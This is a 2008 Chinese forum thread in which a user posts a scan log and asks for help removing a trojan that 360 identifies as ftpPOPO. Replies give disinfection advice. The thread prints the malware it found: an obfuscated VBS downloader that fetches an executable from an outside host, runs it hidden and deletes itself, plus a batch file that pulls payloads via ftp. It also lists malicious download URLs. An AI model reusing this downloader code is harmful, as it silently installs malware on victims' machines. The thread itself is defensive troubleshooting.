O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\DDRAW.dll - Microsoft DirectDraw - dd3cec25bf4a9a9e09d95f75af8e110c
O40 - Explorer.EXE - 360.CN - E:\360safe\safemon\safemon.dll - 360安全卫士实时保护模块 - cb9d790910962bb51528fc208daa97b9
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\MSLS31.DLL - Microsoft Line Services library file - de21433576e98bf0439559400d2cec7d
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\webvw.dll - Shell WebView Content & Control Library - 83e5b3d918ca8cab3205c990e4cb2ccc
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\imgutil.dll - IE plugin image decoder support DLL - 9c7476c6e3d2e2e876e062f0ede22d11
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\System32\ICMP.dll - ICMP DLL - 5e30628a4f5a02b80718aa46c92e00ae
O40 - rundll32.exe - Microsoft Corporation - C:\WINNT\system32\LZ32.DLL - LZ Expand/Compress API DLL - 51a5945c1e03a2d1761bcfd7e373d513
=======================================
O41 - ALCXSENS - Sensaura WDM 3D Audio Driver - C:\WINNT\system32\drivers\ALCXSENS.SYS - (running) - Sensaura WDM 3D Audio Driver - Sensaura - ba88534a3ceb6161e7432438b9ea4f54
O41 - DfsDriver - Windows NT Distributed File System Driver - C:\WINNT\system32\drivers\dfs.sys - (running) - Windows NT Distributed File System Driver - Microsoft Corporation - a1e84981288b5875ef4f8790a31b50a2
O41 - E100B - Intel(R) PRO/100 Adapter NDIS 5 driver - C:\WINNT\system32\drivers\e100bnt5.sys - (running) - Intel(R) PRO/100 Adapter NDIS 5 driver - Intel Corporation - d1ea591abc475dffdc34e0c8a1db0a36
O41 - Nbf - NetBEUI Frames Protocol Driver - C:\WINNT\system32\drivers\nbf.sys - (running) - NetBEUI Frames Protocol Driver - Microsoft Corporation - c833146f3758b29ccf100fc32dad6fc4
O41 - Parallel - Parallel Printer Driver - C:\WINNT\system32\drivers\parallel.sys - (running) - Parallel Printer Driver - Microsoft Corporation - db273d04cfb7d6b7ee0110c657c7dd14
O41 - RsAntiSpyware - RsBoot - C:\WINNT\system32\drivers\RsBoot.sys - (running) - RsBoot - Beijing Rising - 73e54c2429fb776e676977c512a85bd9
O41 - uhcd - Universal Host Controller Driver - C:\WINNT\system32\drivers\uhcd.sys - (running) - Universal Host Controller Driver - Microsoft Corporation - 376fb5e14b9d375db3536ba563eae97a
O41 - usbhub20 - Default Hub Driver for USB 2.0 - C:\WINNT\system32\drivers\usbhub20.sys - (running) - Default Hub Driver for USB 2.0 - Microsoft Corporation - b0205d19ba25ca654810d0aed04496a8
O41 - usbscan - USB Scanner Driver - C:\WINNT\system32\drivers\usbscan.sys - (running) - USB Scanner Driver - Microsoft Corporation - 6c0a98c98b84eee9e3fb1cf86b6250b8
O41 - VRVSYS - Windows NT/2K/XP File System Monitor - c:\bxy_vrv\filemon.sys - (running) - Windows NT/2K/XP File System Monitor - BXY - 57bbd677bdfc82a8ee05d6bc4300f451
O41 - GMSIPCI - GMSIPCI - F:\INSTALL\GMSIPCI.SYS - (not running) -  -  -
O41 - NetDetect - Network Card Detection driver - C:\WINNT\system32\drivers\netdtect.sys - (not running) - Network Card Detection driver - Microsoft Corporation - 9b2a6147a22f7e696cc7538283de6346
O41 - RCA - RCA filter - C:\WINNT\system32\drivers\rca.sys - (not running) - RCA filter - Microsoft Corporation - afce1f733a6aa3a90ac60794dfb26104
O41 - xyantivirus - Windows NT/2K/XP File System Monitor - C:\bxy_vrv\filemon.sys - (not running) - Windows NT/2K/XP File System Monitor - BXY - 57bbd677bdfc82a8ee05d6bc4300f451
=======================================
[userinit.exe情况]
MD5: 8ca97e8b3067a8a75f89fd6091258d05
文件大小: 17680
版本信息: 5.00.2195.6612
是否签名: 否!!!!!
未被感染
=======================================
[URL历史情况]

[Copy to clipboard] [ - ]

CODE:

http://w2.163500.net/down/12.exe
http://w3.163500.net/down/19.exe
http://w4.163500.net/down/27.exe
http://w3.163500.net/down/13.exe
http://w4.163500.net/down/30.exe
http://w3.163500.net/down/14.exe
http://w3.163500.net/down/21.exe
http://w1.163500.net/down/1.exe
http://w2.163500.net/down/11.exe
http://w4.163500.net/down/23.exe
http://w4.163500.net/down/24.exe
http://w3.163500.net/down/20.exe
http://w2.163500.net/down/10.exe
http://w4.163500.net/down/25.exe
http://w4.163500.net/down/33.exe
http://w1.163500.net/down/4.exe
http://w3.163500.net/down/18.exe
http://w1.163500.net/down/2.exe
http://w4.163500.net/down/28.exe
http://w3.163500.net/down/17.exe
http://w3.163500.net/down/16.exe
http://w4.163500.net/down/29.exe
http://w2.163500.net/down/9.exe
http://w4.163500.net/down/22.exe
http://w1.163500.net/down/5.exe
http://w3.163500.net/down/15.exe
http://w1.163500.net/down/3.exe
http://w2.163500.net/down/8.exe
http://w2.163500.net/down/7.exe
http://w4.163500.net/down/26.exe
http://w2.163500.net/down/6.exe
http://update.360safe.com/safe/safeup.cab?m=73d2b5406d8948be94d1e62c95b06bae&t=749296&ver=4.0.3.1012
http://dl.360safe.com/libwhite.cab?t=434984
http://update.360safe.com/safe/safeup.cab?m=73d2b5406d8948be94d1e62c95b06bae&t=739312&ver=4.0.3.1012
http://updatem.360safe.com/safe/safeupm.cab?type=tray&m=73d2b5406d8948be94d1e62c95b06bae&t=434812&ver=4.0.3.1012

=======================================

7a97a5d840dbe3a8b959b819b5652007

[ 本帖最后由 zhuwy1 于 2008-3-26 13:53 编辑 ]

100 - 未知 - Process: rundll32.exe [Windows Shell Common Dll] - C:\WINNT\system32\rundll32.exe C:\WINNT\system32\shell32.dll,OpenAs_RunDLL C:\WINNT\help\bai.VBS -

不知道此项何用意:
bai.VBS内容如下

on error resume next
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+"ps.gogo52o.com/rc/ttjj1/gx"+Chr(46)+Chr(106)+Chr(112)+Chr(103),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oshell.RUN "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),vbhide
oshell.RUN "cmd.exe /c del C:\WINNT\help\bai.VBS",vbhide




其中还有一批处理bai.bat内容如下:

del sss0.exe
ftp.exe -s:C:\WINNT\help\help.dll
if not exist sss0.exe sfd -s:C:\WINNT\help\help.dll
if not exist sss0.exe sft -s:C:\WINNT\help\help.dll
sss0.exe
sss0.exe
sss01.exe
sss01.exe
if not exist sss0.exe C:\WINNT\help\bai.VBS
:end
del C:\WINNT\help\help.dll
del C:\WINNT\help\bai.BAT
exit

[ 本帖最后由 zhuwy1 于 2008-3-25 13:31 编辑 ]

sreng也被劫持了?

应该是的,毒是被我搞定了,但具体还不知道是什么木马?

强人啊，

重启后没问题了,系统正常了

大家好 下载360修复工具  然后启动360可对此查杀
360命名为：ftpPOPO木马

新的?
我是按您说的做的,(360安全卫士真的不错).还配合了其它工具,之前我还恢复过镜像(因机器急用)后,再次感染,后经仔细查杀,发现其它盘也有.
,所以造成木马反反复复发作.

这里给大家几点建议:

1.给系统盘清完毒后,(恢复镜像.重装系统等)再仔细查杀其它盘符,以做到杀毒彻底,以免反复感染.在打开盘符时请勿双击.
2.结合多种工具.杀软,再加手工清理,以便达到理想的效果.

我用３６０没干掉，，，，

我的是用360杀完毒然后重新装系统！！系统内如果感染过病毒而你的GHOST文件在硬盘内也会被更改的！！！所以最好是重新装一个系统！！！